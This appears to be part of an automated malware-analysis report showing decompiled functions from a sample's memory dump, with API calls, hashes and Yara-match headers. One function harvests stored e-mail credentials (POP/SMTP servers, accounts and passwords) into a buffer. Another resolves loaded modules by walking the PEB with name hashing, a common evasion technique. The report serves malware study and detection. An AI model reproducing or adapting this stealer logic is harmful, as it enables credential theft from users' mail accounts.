• Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00405924(WCHAR* _a4, WCHAR* _a8) {
	WCHAR* _t4;
	void* _t5;

	E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
	_t4 = StrStrW(_a4, _a8); // executed
	return _t4;
}

Instruction addresses: 0x00405932, 0x0040593d, 0x00405940

APIs
• StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
Memory Dump Source
• Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
• Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
• Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
• Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

APIs
• CoInitialize.OLE32(00000000), ref: 0040438F
• CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
• VariantInit.OLEAUT32(?), ref: 004043C4
• SysAllocString.OLEAUT32(?), ref: 004043CD
• VariantInit.OLEAUT32(?), ref: 00404414
• SysAllocString.OLEAUT32(?), ref: 00404419
• VariantInit.OLEAUT32(?), ref: 00404431
Memory Dump Source
• Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: InitVariant$AllocString$CreateInitializeInstance
• String ID:
• API String ID: 1312198159-0
• Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
• Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
• Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
• Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
	signed int _v8;
	signed int _v12;
	intOrPtr _v16;
	intOrPtr _v20;
	intOrPtr _v24;
	intOrPtr _v28;
	intOrPtr _v32;
	intOrPtr _v36;
	intOrPtr _v40;
	intOrPtr _v44;
	void* __edi;
	void* __esi;
	intOrPtr _t40;
	intOrPtr _t45;
	intOrPtr _t47;
	void* _t71;
	void* _t75;
	void* _t77;

	_t72 = _a4;
	// _a4 refers to a mail account record; each E00404BEE / E00404BA7 / E00404C4E call below
	// fetches one named field of it (the names are listed under "String ID" for this function)
	_t71 = E00404BEE(__ebx, *_a4, L"EmailAddress");
	_t81 = _t71;
	if(_t71 != 0) {
		_push(__ebx);
		_t67 = E00404BEE(__ebx, *_t72, L"Technology");
		_v16 = E00404BEE(_t37, *_t72, L"PopServer");
		_v40 = E00404BA7(_t81, *_t72, L"PopPort"); // the two port fields use a separate getter (E00404BA7) and writer (E00405781)
		_t40 = E00404BEE(_t37, *_t72, L"PopAccount");
		_v8 = _v8 & 0x00000000;
		_v20 = _t40;
		_v24 = E00404C4E(_t71, *_t72, L"PopPassword", &_v8); // _v8 is filled in by E00404C4E and stays zero when no password is found
		_v28 = E00404BEE(_t67, *_t72, L"SmtpServer");
		_v44 = E00404BA7(_t81, *_t72, L"SmtpPort");
		_t45 = E00404BEE(_t67, *_t72, L"SmtpAccount");
		_v12 = _v12 & 0x00000000;
		_v32 = _t45;
		_t47 = E00404C4E(_t71, *_t72, L"SmtpPassword", &_v12);
		_t77 = _t75 + 0x50;
		_v36 = _t47;
		if(_v8 != 0 || _v12 != 0) {
			// at least one password was recovered: every field is appended to the buffer referenced by *0x49f934
			E00405872(*0x49f934, _t71, 1, 0);
			E00405872(*0x49f934, _t67, 1, 0);
			_t74 = _v16;
			E00405872(*0x49f934, _v16, 1, 0);
			E00405781(*0x49f934, _v40);
			E00405872(*0x49f934, _v20, 1, 0);
			_push(_v8);
			E00405762(_v16, *0x49f934, _v24);
			E00405872(*0x49f934, _v28, 1, 0);
			E00405781(*0x49f934, _v44);
			E00405872(*0x49f934, _v32, 1, 0);
			_push(_v12);
			E00405762(_t74, *0x49f934, _v36);
			_t77 = _t77 + 0x88;
		} else {
			_t74 = _v16;
		}
		// release the per-field buffers, one E0040471C call per lookup result
		E0040471C(_t71);
		E0040471C(_t67);
		E0040471C(_t74);
		E0040471C(_v20);
		E0040471C(_v24);
		E0040471C(_v28);
		E0040471C(_v32);
		E0040471C(_v36);
	}
	return 1;
}

Instruction addresses: 0x0040d070, 0x0040d080, 0x0040d084, 0x0040d086, 0x0040d08c, 0x0040d0a0, 0x0040d0ae, 0x0040d0bd, 0x0040d0c0, 0x0040d0c5, 0x0040d0c9, 0x0040d0e3, 0x0040d0f2, 0x0040d101, 0x0040d104, 0x0040d109, 0x0040d110, 0x0040d11e, 0x0040d123, 0x0040d126, 0x0040d12d, 0x0040d145, 0x0040d154, 0x0040d15a, 0x0040d166, 0x0040d174, 0x0040d186, 0x0040d18e, 0x0040d19a, 0x0040d1ac, 0x0040d1ba, 0x0040d1cc, 0x0040d1d1, 0x0040d1dd, 0x0040d1e2, 0x0040d1e7, 0x0040d1e7, 0x0040d1e7, 0x0040d1eb, 0x0040d1f1, 0x0040d1f7, 0x0040d1ff, 0x0040d207, 0x0040d20f, 0x0040d217, 0x0040d21f, 0x0040d227, 0x0040d230

Strings
Memory Dump Source
• Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
• API String ID: 0-2111798378
• Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
• Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
• Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
• Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%
E0040317B(intOrPtr _a4) {
	signed int _v8;
	intOrPtr _v12;
	void* __ecx;
	intOrPtr _t17;
	void* _t21;
	intOrPtr* _t23;
	void* _t26;
	void* _t28;
	intOrPtr* _t31;
	void* _t33;
	signed int _t34;

	_push(_t25);
	_t1 = &_v8;
	*_t1 = _v8 & 0x00000000;
	_t34 = *_t1;
	_v8 = *[fs:0x30]; // fs:[0x30] is the PEB on 32-bit Windows
	_t23 = *((intOrPtr*)(*((intOrPtr*)(_v8 + 0xc)) + 0xc)); // PEB.Ldr (+0xc) -> InLoadOrderModuleList.Flink (+0xc)
	_t31 = _t23;
	do {
		_v12 = *((intOrPtr*)(_t31 + 0x18)); // LDR_DATA_TABLE_ENTRY.DllBase
		_t28 = E00402C77(_t34, *((intOrPtr*)(_t31 + 0x28))); // +0x28 is FullDllName.Buffer
		_pop(_t26);
		_t35 = _t28;
		if(_t28 == 0) {
			goto L3;
		} else {
			// derive a value from the module name (E00405D24 yields its length) and compare it with the caller's constant
			E004032EA(_t35, _t28, 0);
			_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
			_t33 = _t33 + 0x14;
			if(_a4 == _t21) {
				_t17 = _v12; // match: return this module's base address
			} else {
				goto L3;
			}
		}
		L5:
		return _t17;
		L3:
		_t31 = *_t31; // next entry in the load-order list
	} while (_t23 != _t31);
	_t17 = 0; // list exhausted without a match
	goto L5;
}

Instruction addresses: 0x0040317f, 0x00403180, 0x00403180, 0x00403180, 0x0040318d, 0x00403196, 0x00403199, 0x0040319b, 0x004031a1, 0x004031a9, 0x004031ab, 0x004031ac, 0x004031ae, 0x00000000, 0x004031b0, 0x004031b3, 0x004031c2, 0x004031c7, 0x004031cd, 0x004031e0, 0x00000000, 0x00000000, 0x00000000, 0x004031cd, 0x004031d7, 0x004031dd, 0x004031cf, 0x004031cf, 0x004031d1, 0x004031d5, 0x00000000

Memory Dump Source
• Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
• Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
• Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
• Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
Uniqueness

Uniqueness Score: -1.00%